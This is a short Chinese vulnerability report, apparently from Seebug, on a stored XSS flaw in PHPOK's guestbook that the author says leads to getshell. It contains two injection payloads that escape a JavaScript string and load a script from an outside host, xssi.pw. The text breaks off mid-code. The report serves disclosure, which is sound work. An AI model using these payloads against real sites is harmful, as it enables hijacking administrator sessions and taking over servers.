PHPOK#XSS利用突破到GetShell第一发

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 数据库对存入进行过滤,但是取出来的时候,仍然可利用XSS完成GetShell. ### 详细说明: 在线留言功能里面留言主题在存入数据的时候都进行了过滤 [<img src="https://images.seebug.org/upload/201404/04171936a4830996311418be4b588ee8073d67c8.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/04171936a4830996311418be4b588ee8073d67c8.jpg) 数据库内容 [<img src="https://images.seebug.org/upload/201404/04171948868b8df5bc63051bf8732f26a6a3c623.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/04171948868b8df5bc63051bf8732f26a6a3c623.jpg) 数据库的字段长度为255,可以写任何的数据进去操作了 如: ``` ');var s=document.createElement('script');s.src='http://xssi.pw/fPJgOU';document.body.appendChild(s);(' ``` 另外: ');load_js('http://xssi.pw/fPJgOU');(' load_js()这个在自己加载的JS里面admin.php?c=js,内容: <code>var basefile = "admin.php"; var ctrl_id = "c"; var func_id = "f"; var webroot = "http://192.168.84.140/"; var apifile = "api.php"; var lang = new Array(); lang["1001"] = "您好,<b><span...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息